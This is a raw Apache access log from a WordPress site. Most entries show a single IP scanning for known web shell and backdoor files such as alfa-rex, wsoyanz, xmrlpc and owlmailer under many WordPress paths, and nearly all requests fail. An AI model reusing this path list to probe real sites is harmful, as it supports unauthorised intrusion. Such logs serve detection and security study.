172.200.236.244 - - [30/Mar/2025:23:14:05 -0400] "GET /cgi-bin/cloud.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:06 -0400] "GET /wp-content/updates.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:07 -0400] "GET /css/cloud.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:07 -0400] "GET /wp-admin/user/cloud.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:08 -0400] "GET /img/cloud.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:08 -0400] "GET /wp-admin/css/colors/coffee/cloud.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:09 -0400] "GET /wp-admin/images/cloud.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:10 -0400] "GET /avaa.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:10 -0400] "GET /images/cloud.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:11 -0400] "GET /wp-admin/js/widgets/cloud.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:11 -0400] "GET /wp-includes/Requests/Text/admin.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:12 -0400] "GET /wp-admin/css/colors/cloud.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:12 -0400] "GET /wp-admin/includes/cloud.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:13 -0400] "GET /wp-admin/css/colors/blue/cloud.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:14 -0400] "GET /wp-admin/cloud.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:14 -0400] "GET /updates.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:15 -0400] "GET /libraries/legacy/updates.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:15 -0400] "GET /libraries/phpmailer/updates.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:16 -0400] "GET /libraries/vendor/updates.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:16 -0400] "GET /alfa-rex.php7 HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:17 -0400] "GET /alfanew.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:17 -0400] "GET /wp-content/plugins/Cache/Cache.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:18 -0400] "GET /wp-admin/js/widgets/about.php7 HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:19 -0400] "GET /wp-p.php7 HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:19 -0400] "GET /wp-admin/repeater.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:20 -0400] "GET /wp-includes/repeater.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:21 -0400] "GET /wp-content/repeater.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:21 -0400] "GET /wsoyanz.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:22 -0400] "GET /yanz.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:24 -0400] "GET /wp-content/plugins/seoo/wsoyanz.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:24 -0400] "GET /wp-content/plugins/seoo/wsoyanz1.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:25 -0400] "GET /cache-compat.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:26 -0400] "GET /ajax-actions.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:27 -0400] "GET /wp-admin/ajax-actions.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:27 -0400] "GET /wp-consar.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:28 -0400] "GET /repeater.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:29 -0400] "GET /admin-post.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:29 -0400] "GET /wp-admin/maint/maint/ajax-actions.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:30 -0400] "GET /wp-admin/dropdown.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:30 -0400] "GET /wp-admin/css/index.php HTTP/1.1" 301 0 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:31 -0400] "GET /wp-admin/css/ HTTP/1.1" 403 1242 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:31 -0400] "GET /dropdown.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:32 -0400] "GET /about.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:32 -0400] "GET /admin.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:33 -0400] "GET /about.php7 HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:34 -0400] "GET /alfanew.php7 HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:34 -0400] "GET /adminfuns.php7 HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:35 -0400] "GET /ebs.php7 HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:35 -0400] "GET /ws.php7 HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:36 -0400] "GET /alfanew2.php7 HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:36 -0400] "GET /alfa-rex2.php7 HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:36 -0400] "GET /wp-admin/images/index.php HTTP/1.1" 301 0 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:37 -0400] "GET /wp-admin/images/ HTTP/1.1" 403 1242 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:37 -0400] "GET /wp-admin/css/colors/index.php HTTP/1.1" 301 0 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:37 -0400] "GET /wp-admin/css/colors/ HTTP/1.1" 403 1242 "-" "-"
198.54.114.83 - - [30/Mar/2025:23:14:38 -0400] "POST /wp-cron.php?doing_wp_cron=1743390878.3429789543151855468750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
172.200.236.244 - - [30/Mar/2025:23:14:38 -0400] "GET /wp-content/themes/pridmag/db.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:39 -0400] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:40 -0400] "GET /wp-content/plugins/linkpreview/db.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:41 -0400] "GET /wp-content/themes/seotheme/db.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:42 -0400] "GET /wp-content/plugins/seoplugins/db.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:43 -0400] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:43 -0400] "GET /.well-known/pki-validation/xmrlpc.php HTTP/1.1" 404 1251 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:43 -0400] "GET /.well-known/acme-challenge/xmrlpc.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:44 -0400] "GET /wp-admin/network/xmrlpc.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:45 -0400] "GET /xmrlpc.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:46 -0400] "GET /cgi-bin/xmrlpc.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:46 -0400] "GET /css/xmrlpc.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:47 -0400] "GET /wp-admin/user/xmrlpc.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:47 -0400] "GET /img/xmrlpc.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:48 -0400] "GET /wp-admin/css/colors/coffee/xmrlpc.php HTTP/1.1" 404 8272 "-" "-"
198.54.114.83 - - [30/Mar/2025:23:14:49 -0400] "POST /wp-cron.php?doing_wp_cron=1743390889.2125799655914306640625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
172.200.236.244 - - [30/Mar/2025:23:14:48 -0400] "GET /wp-admin/images/xmrlpc.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:50 -0400] "GET /images/xmrlpc.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:50 -0400] "GET /wp-admin/js/widgets/xmrlpc.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:51 -0400] "GET /wp-admin/css/colors/xmrlpc.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:52 -0400] "GET /wp-admin/includes/xmrlpc.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:52 -0400] "GET /wp-admin/css/colors/blue/xmrlpc.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:53 -0400] "GET /wp-admin/xmrlpc.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:53 -0400] "GET /smaxx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:54 -0400] "GET /wp-admin/smaxx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:54 -0400] "GET /wp-content/plugins/WordPressCore/smaxx.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:55 -0400] "GET /wp-includes/images/smaxx.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:55 -0400] "GET /wp-content/plugins/core-plugin/smaxx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:56 -0400] "GET /wp-includes/smaxx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:56 -0400] "GET /wp-content/plugins/smaxx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:57 -0400] "GET /xt/smaxx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:57 -0400] "GET /wp-content/smaxx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:58 -0400] "GET /wp-content/themes/twentyfive/smaxx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:58 -0400] "GET /wp-content/upgrade/sx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:59 -0400] "GET /.well-known/pki-validation/sx.php HTTP/1.1" 404 1251 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:59 -0400] "GET /wp-admin/user/sx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:00 -0400] "GET /wp-includes/ID3/sx.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:00 -0400] "GET /wp-includes/blocks/sx.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:00 -0400] "GET /sx.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:01 -0400] "GET /wp-includes/sx.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:02 -0400] "GET /wp-admin/sx.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:02 -0400] "GET /wp-content/plugins/fix/sx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:03 -0400] "GET /wp-admin/includes/sx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:05 -0400] "GET /cgi-bin/sx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:06 -0400] "GET /wp-admin/css/sx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:08 -0400] "GET /wp-admin/network/sx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:09 -0400] "GET /wp-includes/block-supports/sx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:10 -0400] "GET /wp-includes/IXR/sx.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:11 -0400] "GET /.well-known/sx.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:12 -0400] "GET /wp-includes/js/tinymce/skins/lightgray/fonts/sx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:12 -0400] "GET /wp-content/sx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:13 -0400] "GET /wp-content/plugins/elementor/sx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:13 -0400] "GET /.well-known/acme-challenge/sx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:14 -0400] "GET /wp-includes/js/jcrop/sx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:15 -0400] "GET /wp-includes/rest-api/sx.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:15 -0400] "GET /wp-admin/images/sx.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:16 -0400] "GET /wp-admin/css/colors/blue/blue.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:17 -0400] "GET /chosen HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:17 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:18 -0400] "GET /install.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:19 -0400] "GET /wp-includes/images/include.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:19 -0400] "GET /gel4y.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:20 -0400] "GET /comfunctions.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:20 -0400] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:21 -0400] "GET /wp-content/themes/wp-classic/inc/index.php HTTP/1.1" 301 0 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:21 -0400] "GET /wp-content/themes/wp-classic/inc/ HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:22 -0400] "GET /assets/images/1p.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:22 -0400] "GET /class.api.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:23 -0400] "GET /plugin.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:24 -0400] "GET /wp-mail.php HTTP/1.1" 403 1123 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:24 -0400] "GET /cong.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:25 -0400] "GET /wp-content/index.php HTTP/1.1" 200 0 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:25 -0400] "GET /.well-known/acme-challenge/xmrlpc.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:25 -0400] "GET /wp-configs.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:25 -0400] "GET /mah.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:26 -0400] "GET /defaults.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:27 -0400] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:28 -0400] "GET /input.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:28 -0400] "GET /admin-ajax.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:29 -0400] "GET /0z.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:29 -0400] "GET /media.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:29 -0400] "GET /chosen.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:30 -0400] "GET /wp-includes/fonts/wp-login.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:31 -0400] "GET /wp-admin/users.php HTTP/1.1" 302 0 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:32 -0400] "GET /wp-content/uploads/cache.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:32 -0400] "GET /.well-known/pki-validation/file.php HTTP/1.1" 404 1251 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:32 -0400] "GET /.wp-cli/wp-login.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:34 -0400] "GET /authorize.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:35 -0400] "GET /wp-admin/css/colors/blue/CasperExV1.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:36 -0400] "GET /wp-admin/includes/users.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:37 -0400] "GET /wp-content/plugins/revslider/includes/external/page/index.php HTTP/1.1" 301 0 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:37 -0400] "GET /wp-content/plugins/revslider/includes/external/page/ HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:38 -0400] "GET /wp.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:39 -0400] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:39 -0400] "GET /wp-2019.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:40 -0400] "GET /upload.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:40 -0400] "GET /themes.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:41 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 302 0 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:41 -0400] "GET /wp-content/plugins/WordPressCore/blkfqnikz.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:42 -0400] "GET /wp/wp-admin/includes/class-wp-page-mvb2yr.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:42 -0400] "GET /content.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:43 -0400] "GET /st.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:43 -0400] "GET /wp-includes/images/smilies/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:44 -0400] "GET /simple.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:44 -0400] "GET /function.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:44 -0400] "GET /ynz.PhP7 HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:45 -0400] "GET /wp-content/style-css.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:45 -0400] "GET /wp-includes/IXR/wp-login.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:46 -0400] "GET /.well-known/acme-challenge/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:46 -0400] "GET /wordpress/wp-includes/IXR/allez.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:46 -0400] "GET /rendixd.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:47 -0400] "GET /wp-admin/css/admin.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:47 -0400] "GET /filefuns.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:48 -0400] "GET /options.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:48 -0400] "GET /wp-includes/js/tinymce/skins/lightgray/img/index.php HTTP/1.1" 301 0 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:49 -0400] "GET /wp-includes/js/tinymce/skins/lightgray/img/ HTTP/1.1" 403 1242 "-" "-"
198.54.114.83 - - [30/Mar/2025:23:15:49 -0400] "POST /wp-cron.php?doing_wp_cron=1743390949.4041750431060791015625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
172.200.236.244 - - [30/Mar/2025:23:15:49 -0400] "GET /edit.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:49 -0400] "GET /user.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:50 -0400] "GET /worm0.PhP7 HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:51 -0400] "GET /wp-includes/js/tinymce/skins/wordpress/images/index.php HTTP/1.1" 301 0 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:51 -0400] "GET /wp-includes/js/tinymce/skins/wordpress/images/ HTTP/1.1" 403 1242 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:51 -0400] "GET /.well-known//.well-known/owlmailer.php HTTP/1.1" 301 0 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:51 -0400] "GET /.well-known/.well-known/owlmailer.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:52 -0400] "GET /wp-content/uploads/cong.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:52 -0400] "GET /01.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:53 -0400] "GET /wp-content/uploads/wp-login.php.suspected HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:54 -0400] "GET /wp-includes/rest-api/endpoints/html.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:54 -0400] "GET /wp-admin/js/widgets/cong.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:55 -0400] "GET /doc.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:56 -0400] "GET /ws.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:56 -0400] "GET /link.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:15:58 -0400] "GET /autoload_classmap.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:16:00 -0400] "GET /wp-admin/js/privacy-tools.min.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:16:00 -0400] "GET /wp-includes/pomo/wp-login.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:16:01 -0400] "GET /db.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:16:02 -0400] "GET /wp-content/uploads/error_log.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:16:02 -0400] "GET /google.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:16:03 -0400] "GET /wp-includes/sts.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:16:04 -0400] "GET /wp-includes/pomo/fgertreyersd.php.suspected HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:16:04 -0400] "GET /wp-includes/Requests/dropdown.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:16:05 -0400] "GET /wp-content/install.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:16:05 -0400] "GET /.well-known/admin.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:16:06 -0400] "GET /revision.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:16:06 -0400] "GET /css/sgd.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:16:07 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 200 0 "-" "-"
216.244.66.243 - - [30/Mar/2025:23:16:37 -0400] "GET /comment-concevoir-un-mur-de-galerie/feed/ HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:23:20:05 -0400] "POST /wp-cron.php?doing_wp_cron=1743391203.2194459438323974609375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
216.244.66.243 - - [30/Mar/2025:23:19:57 -0400] "GET /lelegance-fonctionnelle-le-mobilier-de-bureau-moderne/ HTTP/1.1" 200 11613 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:23:28:05 -0400] "POST /wp-cron.php?doing_wp_cron=1743391684.9372770786285400390625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
216.244.66.243 - - [30/Mar/2025:23:28:04 -0400] "GET /73411-buy-allacan-25556/ HTTP/1.1" 404 8274 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
38.170.202.198 - - [30/Mar/2025:23:28:27 -0400] "GET /building-true-team-spirit-for-peak-performance-in-sports-part-1/ HTTP/1.1" 200 13712 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Vivaldi/5.3.2679.68"
216.244.66.243 - - [30/Mar/2025:23:28:35 -0400] "GET /microsoft-xbox-one-vs-sony-ps4/ HTTP/1.1" 200 13026 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
38.170.202.198 - - [30/Mar/2025:23:28:37 -0400] "GET /building-true-team-spirit-for-peak-performance-in-sports-part-1/ HTTP/1.1" 200 13712 "http://inversionesgoldie.com/building-true-team-spirit-for-peak-performance-in-sports-part-1/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
